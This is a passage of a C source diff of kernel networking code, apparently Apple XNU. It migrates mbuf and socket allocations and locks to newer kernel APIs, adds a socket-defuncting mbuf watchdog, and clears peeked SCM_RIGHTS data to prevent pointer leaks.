+       mtc = *PERCPU_GET_MASTER(mbuf_mtypes);
+       percpu_foreach_secondary(mtype, mbuf_mtypes) {
+               for (int n = 0; n < MT_MAX; n++) {
+                       mtc.cpu_mtypes[n] += mtype->cpu_mtypes[n];
                }
        }
+
        if (!locked) {
                lck_mtx_lock(mbuf_mlock);
        }
-       for (n = 0; n < MT_MAX; n++) {
+       for (int n = 0; n < MT_MAX; n++) {
                mbstat.m_mtypes[n] = mtc.cpu_mtypes[n];
        }
        if (!locked) {
@@ -1302,13 +1281,11 @@ mbuf_table_init(void)
        unsigned int b, c, s;
        int m, config_mbuf_jumbo = 0;
 
-       MALLOC(omb_stat, struct omb_stat *, OMB_STAT_SIZE(NELEM(mbuf_table)),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(omb_stat != NULL);
+       omb_stat = zalloc_permanent(OMB_STAT_SIZE(NELEM(mbuf_table)),
+           ZALIGN(struct omb_stat));
 
-       MALLOC(mb_stat, mb_stat_t *, MB_STAT_SIZE(NELEM(mbuf_table)),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mb_stat != NULL);
+       mb_stat = zalloc_permanent(MB_STAT_SIZE(NELEM(mbuf_table)),
+           ZALIGN(mb_stat_t));
 
        mb_stat->mbs_cnt = NELEM(mbuf_table);
        for (m = 0; m < NELEM(mbuf_table); m++) {
@@ -1466,13 +1443,49 @@ mbuf_get_class(struct mbuf *m)
 bool
 mbuf_class_under_pressure(struct mbuf *m)
 {
-       int mclass = mbuf_get_class(m); // TODO - how can we get the class easily???
+       int mclass = mbuf_get_class(m);
+
+       if (m_total(mclass) - m_infree(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) {
+               /*
+                * The above computation does not include the per-CPU cached objects.
+                * As a fast-path check this is good-enough. But now we do
+                * the "slower" count of the cached objects to know exactly the
+                * number of active mbufs in use.
+                *
+                * We do not take the mbuf_lock here to avoid lock-contention. Numbers
+                * might be slightly off but we don't try to be 100% accurate.
+                * At worst, we drop a packet that we shouldn't have dropped or
+                * we might go slightly above our memory-pressure threshold.
+                */
+               mcache_t *cp = m_cache(mclass);
+               mcache_cpu_t *ccp = &cp->mc_cpu[0];
+
+               int bktsize = os_access_once(ccp->cc_bktsize);
+               uint32_t bl_total = os_access_once(cp->mc_full.bl_total);
+               uint32_t cached = 0;
+               int i;
+
+               for (i = 0; i < ncpu; i++) {
+                       ccp = &cp->mc_cpu[i];
+
+                       int cc_objs = os_access_once(ccp->cc_objs);
+                       if (cc_objs > 0) {
+                               cached += cc_objs;
+                       }
+
+                       int cc_pobjs = os_access_once(ccp->cc_pobjs);
+                       if (cc_pobjs > 0) {
+                               cached += cc_pobjs;
+                       }
+               }
+               cached += (bl_total * bktsize);
 
-       if (m_total(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) {
-               os_log(OS_LOG_DEFAULT,
-                   "%s memory-pressure on mbuf due to class %u, total %u max %u",
-                   __func__, mclass, m_total(mclass), m_maxlimit(mclass));
-               return true;
+               if (m_total(mclass) - m_infree(mclass) - cached >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) {
+                       os_log(OS_LOG_DEFAULT,
+                           "%s memory-pressure on mbuf due to class %u, total %u free %u cached %u max %u",
+                           __func__, mclass, m_total(mclass), m_infree(mclass), cached, m_maxlimit(mclass));
+                       return true;
+               }
        }
 
        return false;
@@ -1527,7 +1540,6 @@ mbinit(void)
 {
        unsigned int m;
        unsigned int initmcl = 0;
-       void *buf;
        thread_t thread = THREAD_NULL;
 
        microuptime(&mb_start);
@@ -1628,12 +1640,6 @@ mbinit(void)
        /* Setup the mbuf table */
        mbuf_table_init();
 
-       /* Global lock for common layer */
-       mbuf_mlock_grp_attr = lck_grp_attr_alloc_init();
-       mbuf_mlock_grp = lck_grp_alloc_init("mbuf", mbuf_mlock_grp_attr);
-       mbuf_mlock_attr = lck_attr_alloc_init();
-       lck_mtx_init(mbuf_mlock, mbuf_mlock_grp, mbuf_mlock_attr);
-
        /*
         * Allocate cluster slabs table:
         *
@@ -1644,9 +1650,8 @@ mbinit(void)
         */
        maxslabgrp =
            (P2ROUNDUP(nmbclusters, (MBSIZE >> MCLSHIFT)) << MCLSHIFT) >> MBSHIFT;
-       MALLOC(slabstbl, mcl_slabg_t * *, maxslabgrp * sizeof(mcl_slabg_t *),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(slabstbl != NULL);
+       slabstbl = zalloc_permanent(maxslabgrp * sizeof(mcl_slabg_t *),
+           ZALIGN(mcl_slabg_t));
 
        /*
         * Allocate audit structures, if needed:
@@ -1661,14 +1666,11 @@ mbinit(void)
                int l;
                mcl_audit_t *mclad;
                maxclaudit = ((maxslabgrp << MBSHIFT) >> PAGE_SHIFT);
-               MALLOC(mclaudit, mcl_audit_t *, maxclaudit * sizeof(*mclaudit),
-                   M_TEMP, M_WAITOK | M_ZERO);
-               VERIFY(mclaudit != NULL);
+               mclaudit = zalloc_permanent(maxclaudit * sizeof(*mclaudit),
+                   ZALIGN(mcl_audit_t));
                for (l = 0, mclad = mclaudit; l < maxclaudit; l++) {
-                       MALLOC(mclad[l].cl_audit, mcache_audit_t * *,
-                           NMBPG * sizeof(mcache_audit_t *),
-                           M_TEMP, M_WAITOK | M_ZERO);
-                       VERIFY(mclad[l].cl_audit != NULL);
+                       mclad[l].cl_audit = zalloc_permanent(NMBPG * sizeof(mcache_audit_t *),
+                           ZALIGN_PTR);
                }
 
                mcl_audit_con_cache = mcache_create("mcl_audit_contents",
@@ -1682,11 +1684,6 @@ mbinit(void)
 
        /* Enable mbuf leak logging, with a lock to protect the tables */
 
-       mleak_lock_grp_attr = lck_grp_attr_alloc_init();
-       mleak_lock_grp = lck_grp_alloc_init("mleak_lock", mleak_lock_grp_attr);
-       mleak_lock_attr = lck_attr_alloc_init();
-       lck_mtx_init(mleak_lock, mleak_lock_grp, mleak_lock_attr);
-
        mleak_activate();
 
        /*
@@ -1696,23 +1693,14 @@ mbinit(void)
         * before alignment is not saved.
         */
        ncpu = ml_wait_max_cpus();
-       MALLOC(buf, void *, MBUF_MTYPES_SIZE(ncpu) + CPU_CACHE_LINE_SIZE,
-           M_TEMP, M_WAITOK);
-       VERIFY(buf != NULL);
-
-       mbuf_mtypes = (mbuf_mtypes_t *)P2ROUNDUP((intptr_t)buf,
-           CPU_CACHE_LINE_SIZE);
-       bzero(mbuf_mtypes, MBUF_MTYPES_SIZE(ncpu));
 
        /* Calculate the number of pages assigned to the cluster pool */
        mcl_pages = (nmbclusters << MCLSHIFT) / PAGE_SIZE;
-       MALLOC(mcl_paddr, ppnum_t *, mcl_pages * sizeof(ppnum_t),
-           M_TEMP, M_WAITOK);
-       VERIFY(mcl_paddr != NULL);
+       mcl_paddr = zalloc_permanent(mcl_pages * sizeof(ppnum_t),
+           ZALIGN(ppnum_t));
 
        /* Register with the I/O Bus mapper */
        mcl_paddr_base = IOMapperIOVMAlloc(mcl_pages);
-       bzero((char *)mcl_paddr, mcl_pages * sizeof(ppnum_t));
 
        embutl = (mbutl + (nmbclusters * MCLBYTES));
        VERIFY(((embutl - mbutl) % MBIGCLBYTES) == 0);
@@ -1820,8 +1808,7 @@ mbinit(void)
        }
 
        /* allocate space for mbuf_dump_buf */
-       MALLOC(mbuf_dump_buf, char *, MBUF_DUMP_BUF_SIZE, M_TEMP, M_WAITOK);
-       VERIFY(mbuf_dump_buf != NULL);
+       mbuf_dump_buf = zalloc_permanent(MBUF_DUMP_BUF_SIZE, ZALIGN_NONE);
 
        if (mbuf_debug & MCF_DEBUG) {
                printf("%s: MLEN %d, MHLEN %d\n", __func__,
@@ -1832,26 +1819,6 @@ mbinit(void)
            (nmbclusters << MCLSHIFT) >> MBSHIFT,
            (nclusters << MCLSHIFT) >> MBSHIFT,
            (njcl << MCLSHIFT) >> MBSHIFT);
-
-       /* initialize lock form tx completion callback table */
-       mbuf_tx_compl_tbl_lck_grp_attr = lck_grp_attr_alloc_init();
-       if (mbuf_tx_compl_tbl_lck_grp_attr == NULL) {
-               panic("%s: lck_grp_attr_alloc_init failed", __func__);
-               /* NOTREACHED */
-       }
-       mbuf_tx_compl_tbl_lck_grp = lck_grp_alloc_init("mbuf_tx_compl_tbl",
-           mbuf_tx_compl_tbl_lck_grp_attr);
-       if (mbuf_tx_compl_tbl_lck_grp == NULL) {
-               panic("%s: lck_grp_alloc_init failed", __func__);
-               /* NOTREACHED */
-       }
-       mbuf_tx_compl_tbl_lck_attr = lck_attr_alloc_init();
-       if (mbuf_tx_compl_tbl_lck_attr == NULL) {
-               panic("%s: lck_attr_alloc_init failed", __func__);
-               /* NOTREACHED */
-       }
-       lck_rw_init(mbuf_tx_compl_tbl_lock, mbuf_tx_compl_tbl_lck_grp,
-           mbuf_tx_compl_tbl_lck_attr);
 }
 
 /*
@@ -2995,6 +2962,30 @@ m_vm_error_stats(uint32_t *cnt, uint64_t *ts, uint64_t *size,
        }
 }
 
+static vm_offset_t
+kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err)
+{
+       vm_offset_t addr = 0;
+       kern_return_t kr = KERN_SUCCESS;
+
+       if (!physContig) {
+               kr = kernel_memory_allocate(mbmap, &addr, size, 0,
+                   KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
+       } else {
+               kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff,
+                   0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
+       }
+
+       if (kr != KERN_SUCCESS) {
+               addr = 0;
+       }
+       if (err) {
+               *err = kr;
+       }
+
+       return addr;
+}
+
 /*
  * Allocate some number of mbuf clusters and place on cluster freelist.
  */
@@ -6786,6 +6777,110 @@ mbuf_waiter_dec(mbuf_class_t class, boolean_t comp)
        }
 }
 
+static bool mbuf_watchdog_defunct_active = false;
+
+static uint32_t
+mbuf_watchdog_socket_space(struct socket *so)
+{
+       if (so == NULL) {
+               return 0;
+       }
+
+       return so->so_snd.sb_mbcnt + so->so_rcv.sb_mbcnt;
+}
+
+struct mbuf_watchdog_defunct_args {
+       struct proc *top_app;
+       uint32_t top_app_space_used;
+};
+
+static int
+mbuf_watchdog_defunct_iterate(proc_t p, void *arg)
+{
+       struct fileproc *fp = NULL;
+       struct mbuf_watchdog_defunct_args *args =
+           (struct mbuf_watchdog_defunct_args *)arg;
+       uint32_t space_used = 0;
+
+       proc_fdlock(p);
+       fdt_foreach(fp, p) {
+               struct fileglob *fg = fp->fp_glob;
+               struct socket *so = NULL;
+
+               if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) {
+                       continue;
+               }
+               so = (struct socket *)fp->fp_glob->fg_data;
+               /*
+                * We calculate the space without the socket
+                * lock because we don't want to be blocked
+                * by another process that called send() and
+                * is stuck waiting for mbufs.
+                *
+                * These variables are 32-bit so we don't have
+                * to worry about incomplete reads.
+                */
+               space_used += mbuf_watchdog_socket_space(so);
+       }
+       proc_fdunlock(p);
+       if (space_used > args->top_app_space_used) {
+               if (args->top_app != NULL) {
+                       proc_rele(args->top_app);
+               }
+               args->top_app = p;
+               args->top_app_space_used = space_used;
+
+               return PROC_CLAIMED;
+       } else {
+               return PROC_RETURNED;
+       }
+}
+
+extern char *proc_name_address(void *p);
+
+static void
+mbuf_watchdog_defunct(thread_call_param_t arg0, thread_call_param_t arg1)
+{
+#pragma unused(arg0, arg1)
+       struct mbuf_watchdog_defunct_args args = {};
+       struct fileproc *fp = NULL;
+
+       proc_iterate(PROC_ALLPROCLIST,
+           mbuf_watchdog_defunct_iterate, &args, NULL, NULL);
+
+       /*
+        * Defunct all sockets from this app.
+        */
+       if (args.top_app != NULL) {
+               os_log(OS_LOG_DEFAULT, "%s: defuncting all sockets from %s.%d",
+                   __func__,
+                   proc_name_address(args.top_app),
+                   proc_pid(args.top_app));
+               proc_fdlock(args.top_app);
+               fdt_foreach(fp, args.top_app) {
+                       struct fileglob *fg = fp->fp_glob;
+                       struct socket *so = NULL;
+
+                       if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) {
+                               continue;
+                       }
+                       so = (struct socket *)fp->fp_glob->fg_data;
+                       socket_lock(so, 0);
+                       if (sosetdefunct(args.top_app, so,
+                           SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL,
+                           TRUE) == 0) {
+                               sodefunct(args.top_app, so,
+                                   SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL);
+                       }
+                       socket_unlock(so, 0);
+               }
+               proc_fdunlock(args.top_app);
+               proc_rele(args.top_app);
+               mbstat.m_forcedefunct++;
+       }
+       mbuf_watchdog_defunct_active = false;
+}
+
 /*
  * Called during slab (blocking and non-blocking) allocation.  If there
  * is at least one waiter, and the time since the first waiter is blocked
@@ -6796,13 +6891,43 @@ mbuf_watchdog(void)
 {
        struct timeval now;
        unsigned int since;
+       static thread_call_t defunct_tcall = NULL;
 
        if (mb_waiters == 0 || !mb_watchdog) {
                return;
        }
 
+       LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED);
+
        microuptime(&now);
        since = now.tv_sec - mb_wdtstart.tv_sec;
+
+       /*
+        * Check if we are about to panic the system due
+        * to lack of mbufs and start defuncting sockets
+        * from processes that use too many sockets.
+        *
+        * We're always called with the mbuf_mlock held,
+        * so that also protects mbuf_watchdog_defunct_active.
+        */
+       if (since >= MB_WDT_MAXTIME / 2 && !mbuf_watchdog_defunct_active) {
+               /*
+                * Start a thread to defunct sockets
+                * from apps that are over-using their socket
+                * buffers.
+                */
+               if (defunct_tcall == NULL) {
+                       defunct_tcall =
+                           thread_call_allocate_with_options(mbuf_watchdog_defunct,
+                           NULL,
+                           THREAD_CALL_PRIORITY_KERNEL,
+                           THREAD_CALL_OPTIONS_ONCE);
+               }
+               if (defunct_tcall != NULL) {
+                       mbuf_watchdog_defunct_active = true;
+                       thread_call_enter(defunct_tcall);
+               }
+       }
        if (since >= MB_WDT_MAXTIME) {
                panic_plain("%s: %d waiters stuck for %u secs\n%s", __func__,
                    mb_waiters, since, mbuf_dump());
@@ -7060,11 +7185,9 @@ slab_get(void *buf)
                lck_mtx_unlock(mbuf_mlock);
 
                /* This is a new buffer; create the slabs group for it */
-               MALLOC(slg, mcl_slabg_t *, sizeof(*slg), M_TEMP,
-                   M_WAITOK | M_ZERO);
-               MALLOC(slg->slg_slab, mcl_slab_t *, sizeof(mcl_slab_t) * NSLABSPMB,
-                   M_TEMP, M_WAITOK | M_ZERO);
-               VERIFY(slg != NULL && slg->slg_slab != NULL);
+               slg = zalloc_permanent_type(mcl_slabg_t);
+               slg->slg_slab = zalloc_permanent(sizeof(mcl_slab_t) * NSLABSPMB,
+                   ZALIGN(mcl_slab_t));
 
                lck_mtx_lock(mbuf_mlock);
                /*
@@ -7471,13 +7594,25 @@ __abortlike
 static void
 mcl_audit_mcheck_panic(struct mbuf *m)
 {
+       char buf[DUMP_MCA_BUF_SIZE];
        mcache_audit_t *mca;
 
        MRANGE(m);
        mca = mcl_audit_buf2mca(MC_MBUF, (mcache_obj_t *)m);
 
        panic("mcl_audit: freed mbuf %p with type 0x%x (instead of 0x%x)\n%s\n",
-           m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(mca));
+           m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(buf, mca));
+       /* NOTREACHED */
+}
+
+__abortlike
+static void
+mcl_audit_verify_nextptr_panic(void *next, mcache_audit_t *mca)
+{
+       char buf[DUMP_MCA_BUF_SIZE];
+       panic("mcl_audit: buffer %p modified after free at offset 0: "
+           "%p out of range [%p-%p)\n%s\n",
+           mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(buf, mca));
        /* NOTREACHED */
 }
 
@@ -7486,10 +7621,7 @@ mcl_audit_verify_nextptr(void *next, mcache_audit_t *mca)
 {
        if (next != NULL && !MBUF_IN_MAP(next) &&
            (next != (void *)MCACHE_FREE_PATTERN || !mclverify)) {
-               panic("mcl_audit: buffer %p modified after free at offset 0: "
-                   "%p out of range [%p-%p)\n%s\n",
-                   mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(mca));
-               /* NOTREACHED */
+               mcl_audit_verify_nextptr_panic(next, mca);
        }
 }
 
@@ -7514,17 +7646,11 @@ mleak_activate(void)
            mleak_alloc_buckets * sizeof(struct mallocation);
        vm_size_t trace_size = mleak_trace_buckets * sizeof(struct mtrace);
 
-       MALLOC(mleak_allocations, struct mallocation *, alloc_size,
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mleak_allocations != NULL);
+       mleak_allocations = zalloc_permanent(alloc_size, ZALIGN(struct mallocation));
+       mleak_traces = zalloc_permanent(trace_size, ZALIGN(struct mtrace));
+       mleak_stat = zalloc_permanent(MLEAK_STAT_SIZE(MLEAK_NUM_TRACES),
+           ZALIGN(mleak_stat_t));
 
-       MALLOC(mleak_traces, struct mtrace *, trace_size,
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mleak_traces != NULL);
-
-       MALLOC(mleak_stat, mleak_stat_t *, MLEAK_STAT_SIZE(MLEAK_NUM_TRACES),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mleak_stat != NULL);
        mleak_stat->ml_cnt = MLEAK_NUM_TRACES;
 #ifdef __LP64__
        mleak_stat->ml_isaddr64 = 1;
@@ -8689,11 +8815,12 @@ _mbwdog_logger(const char *func, const int line, const char *fmt, ...)
 
        LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED);
        if (mbwdog_logging == NULL) {
-               mbwdog_logging = _MALLOC(mbwdog_logging_size,
-                   M_TEMP, M_ZERO | M_NOWAIT);
-               if (mbwdog_logging == NULL) {
-                       return;
-               }
+               /*
+                * This might block under a mutex, which isn't really great,
+                * but this happens once, so we'll live.
+                */
+               mbwdog_logging = zalloc_permanent(mbwdog_logging_size,
+                   ZALIGN_NONE);
        }
        va_start(ap, fmt);
        vsnprintf(p, sizeof(p), fmt, ap);
@@ -8729,80 +8856,6 @@ SYSCTL_PROC(_kern_ipc, OID_AUTO, mbwdog_log,
     CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_LOCKED,
     0, 0, sysctl_mbwdog_log, "A", "");
 
-static int mbtest_val;
-static int mbtest_running;
-
-static void
-mbtest_thread(__unused void *arg)
-{
-       int i;
-       int scale_down = 1;
-       int iterations = 250;
-       int allocations = nmbclusters;
-       iterations = iterations / scale_down;
-       allocations = allocations / scale_down;
-       printf("%s thread starting\n", __func__);
-       for (i = 0; i < iterations; i++) {
-               unsigned int needed = allocations;
-               struct mbuf *m1, *m2, *m3;
-
-               if (njcl > 0) {
-                       needed = allocations;
-                       m3 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, M16KCLBYTES);
-                       m_freem_list(m3);
-               }
-
-               needed = allocations;
-               m2 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MBIGCLBYTES);
-               m_freem_list(m2);
-
-               m1 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MCLBYTES);
-               m_freem_list(m1);
-       }
-
-       printf("%s thread ending\n", __func__);
-
-       OSDecrementAtomic(&mbtest_running);
-       wakeup_one((caddr_t)&mbtest_running);
-}
-
-static void
-sysctl_mbtest(void)
-{
-       /* We launch three threads - wait for all of them */
-       OSIncrementAtomic(&mbtest_running);
-       OSIncrementAtomic(&mbtest_running);
-       OSIncrementAtomic(&mbtest_running);
-
-       thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10);
-       thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10);
-       thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10);
-
-       while (mbtest_running) {
-               msleep((caddr_t)&mbtest_running, NULL, PUSER, "mbtest_running", NULL);
-       }
-}
-
-static int
-mbtest SYSCTL_HANDLER_ARGS
-{
-#pragma unused(arg1, arg2)
-       int error = 0, val, oldval = mbtest_val;
-
-       val = oldval;
-       error = sysctl_handle_int(oidp, &val, 0, req);
-       if (error || !req->newptr) {
-               return error;
-       }
-
-       if (val != oldval) {
-               sysctl_mbtest();
-       }
-
-       mbtest_val = val;
-
-       return error;
-}
 #endif // DEBUG || DEVELOPMENT
 
 static void
@@ -8835,9 +8888,6 @@ mtracelarge_register(size_t size)
 
 SYSCTL_DECL(_kern_ipc);
 #if DEBUG || DEVELOPMENT
-SYSCTL_PROC(_kern_ipc, OID_AUTO, mbtest,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED, &mbtest_val, 0, &mbtest, "I",
-    "Toggle to test mbufs");
 #endif
 SYSCTL_PROC(_kern_ipc, KIPC_MBSTAT, mbstat,
     CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED,
index e1a5241a2ddb1f81f65e81a85bf531ef84a529ac..cc13d328c48a00f0d3797a158de195e727f3b745 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 1998-2020 Apple Inc. All rights reserved.
+ * Copyright (c) 1998-2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -153,10 +153,8 @@ static u_int32_t        so_cache_time;
 static int              socketinit_done;
 static struct zone      *so_cache_zone;
 
-static lck_grp_t        *so_cache_mtx_grp;
-static lck_attr_t       *so_cache_mtx_attr;
-static lck_grp_attr_t   *so_cache_mtx_grp_attr;
-static lck_mtx_t        *so_cache_mtx;
+static LCK_GRP_DECLARE(so_cache_mtx_grp, "so_cache");
+static LCK_MTX_DECLARE(so_cache_mtx, &so_cache_mtx_grp);
 
 #include <machine/limits.h>
 
@@ -410,24 +408,6 @@ socketinit(void)
        PE_parse_boot_argn("socket_debug", &socket_debug,
            sizeof(socket_debug));
 
-       /*
-        * allocate lock group attribute and group for socket cache mutex
-        */
-       so_cache_mtx_grp_attr = lck_grp_attr_alloc_init();
-       so_cache_mtx_grp = lck_grp_alloc_init("so_cache",
-           so_cache_mtx_grp_attr);
-
-       /*
-        * allocate the lock attribute for socket cache mutex
-        */
-       so_cache_mtx_attr = lck_attr_alloc_init();
-
-       /* cached sockets mutex */
-       so_cache_mtx = lck_mtx_alloc_init(so_cache_mtx_grp, so_cache_mtx_attr);
-       if (so_cache_mtx == NULL) {
-               panic("%s: unable to allocate so_cache_mtx\n", __func__);
-               /* NOTREACHED */
-       }
        STAILQ_INIT(&so_cache_head);
 
        so_cache_zone_element_size = (vm_size_t)(sizeof(struct socket) + 4
@@ -442,7 +422,6 @@ socketinit(void)
        soextbkidlestat.so_xbkidle_rcvhiwat = SO_IDLE_BK_IDLE_RCV_HIWAT;
 
        in_pcbinit();
-       sflt_init();
        socket_tclass_init();
 #if MULTIPATH
        mp_pcbinit();
@@ -455,7 +434,7 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how)
        caddr_t temp;
        uintptr_t offset;
 
-       lck_mtx_lock(so_cache_mtx);
+       lck_mtx_lock(&so_cache_mtx);
 
        if (!STAILQ_EMPTY(&so_cache_head)) {
                VERIFY(cached_sock_count > 0);
@@ -465,14 +444,14 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how)
                STAILQ_NEXT((*so), so_cache_ent) = NULL;
 
                cached_sock_count--;
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
 
                temp = (*so)->so_saved_pcb;
                bzero((caddr_t)*so, sizeof(struct socket));
 
                (*so)->so_saved_pcb = temp;
        } else {
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
 
                *so = zalloc_flags(so_cache_zone, how | Z_ZERO);
 
@@ -502,12 +481,12 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how)
 static void
 cached_sock_free(struct socket *so)
 {
-       lck_mtx_lock(so_cache_mtx);
+       lck_mtx_lock(&so_cache_mtx);
 
        so_cache_time = net_uptime();
        if (++cached_sock_count > max_cached_sock_count) {
                --cached_sock_count;
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
                zfree(so_cache_zone, so);
        } else {
                if (so_cache_hw < cached_sock_count) {
@@ -517,7 +496,7 @@ cached_sock_free(struct socket *so)
                STAILQ_INSERT_TAIL(&so_cache_head, so, so_cache_ent);
 
                so->cache_timestamp = so_cache_time;
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
        }
 }
 
@@ -574,7 +553,7 @@ so_cache_timer(void)
        int             n_freed = 0;
        boolean_t rc = FALSE;
 
-       lck_mtx_lock(so_cache_mtx);
+       lck_mtx_lock(&so_cache_mtx);
        so_cache_timeouts++;
        so_cache_time = net_uptime();
 
@@ -602,7 +581,7 @@ so_cache_timer(void)
                rc = TRUE;
        }
 
-       lck_mtx_unlock(so_cache_mtx);
+       lck_mtx_unlock(&so_cache_mtx);
        return rc;
 }
 
@@ -2510,9 +2489,7 @@ sosend(struct socket *so, struct sockaddr *addr, struct uio *uio,
                                if (error) {
                                        if (error == EJUSTRETURN) {
                                                error = 0;
-                                               clen = 0;
-                                               control = NULL;
-                                               top = NULL;
+                                               goto packet_consumed;
                                        }
                                        goto out_locked;
                                }
@@ -3055,6 +3032,20 @@ done:
        return error;
 }
 
+/*
+ * When peeking SCM_RIGHTS, the actual file descriptors are not yet created
+ * so clear the data portion in order not to leak the file pointers
+ */
+static void
+sopeek_scm_rights(struct mbuf *rights)
+{
+       struct cmsghdr *cm = mtod(rights, struct cmsghdr *);
+
+       if (cm->cmsg_type == SCM_RIGHTS) {
+               memset(cm + 1, 0, cm->cmsg_len - sizeof(*cm));
+       }
+}
+
 /*
  * Process one or more MT_CONTROL mbufs present before any data mbufs
  * in the first mbuf chain on the socket buffer.  If MSG_PEEK, we
@@ -3103,6 +3094,9 @@ soreceive_ctl(struct socket *so, struct mbuf **controlp, int flags,
                                        error = ENOBUFS;
                                        goto done;
                                }
+
+                               sopeek_scm_rights(*controlp);
+
                                controlp = &(*controlp)->m_next;
                        }
                        m = m->m_next;
@@ -3681,6 +3675,11 @@ dontblock:
                } else if (type == MT_OOBDATA) {
                        break;
                }
+
+               if (m->m_type != MT_OOBDATA && m->m_type != MT_DATA &&
+                   m->m_type != MT_HEADER) {
+                       break;
+               }
                /*
                 * Make sure to allways set MSG_OOB event when getting
                 * out of band data inline.
@@ -8009,10 +8008,6 @@ socket_post_kev_msg_closed(struct socket *so)
                            &ev.ev_data, sizeof(ev));
                }
        }
-       if (socksa != NULL) {
-               FREE(socksa, M_SONAME);
-       }
-       if (peersa != NULL) {
-               FREE(peersa, M_SONAME);
-       }
+       FREE(socksa, M_SONAME);
+       FREE(peersa, M_SONAME);
 }
index e8272167695a5bd06f351ee45b3f1cc5178d2bf2..45e0f674ea53ac4db436b97743f92207baa8d12a 100644 (file)
@@ -166,8 +166,8 @@ static boolean_t uio_array_is_valid(struct uio **, u_int);
 static int recv_msg_array_is_valid(struct recv_msg_elem *, u_int);
 static int internalize_recv_msghdr_array(const void *, int, int,
     u_int, struct user_msghdr_x *, struct recv_msg_elem *);
-static u_int externalize_recv_msghdr_array(void *, int, int, u_int,
-    const struct user_msghdr_x *, struct recv_msg_elem *);
+static u_int externalize_recv_msghdr_array(struct proc *, struct socket *, void *, u_int,
+    struct user_msghdr_x *, struct recv_msg_elem *, int *);
 static struct recv_msg_elem *alloc_recv_msg_array(u_int count);
 static void free_recv_msg_array(struct recv_msg_elem *, u_int);
 
@@ -1307,7 +1307,7 @@ sendit(struct proc *p, struct socket *so, struct user_msghdr *mp, uio_t uiop,
                *retval = (int)(len - uio_resid(uiop));
        }
 bad:
-       if (to != NULL && want_free) {
+       if (want_free) {
                FREE(to, M_SONAME);
        }
 out:
@@ -1540,6 +1540,9 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval)
 
        KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0);
 
+       size_of_msghdr = IS_64BIT_PROCESS(p) ?
+           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
+
        if (uap->flags & MSG_SKIPCFIL) {
                error = EPERM;
                goto out;
@@ -1569,28 +1572,25 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval)
                uap->cnt = somaxsendmsgx;
        }
 
-       user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x),
-           M_TEMP, M_WAITOK | M_ZERO);
+       user_msg_x = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO);
        if (user_msg_x == NULL) {
-               DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
-       uiop = _MALLOC(uap->cnt * sizeof(struct uio *),
-           M_TEMP, M_WAITOK | M_ZERO);
+       uiop = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * sizeof(struct uio *), Z_WAITOK | Z_ZERO);
        if (uiop == NULL) {
-               DBG_PRINTF("%s _MALLOC() uiop failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc uiop failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
 
-       size_of_msghdr = IS_64BIT_PROCESS(p) ?
-           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
-
-       umsgp = _MALLOC(uap->cnt * size_of_msghdr,
-           M_TEMP, M_WAITOK | M_ZERO);
+       umsgp = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO);
        if (umsgp == NULL) {
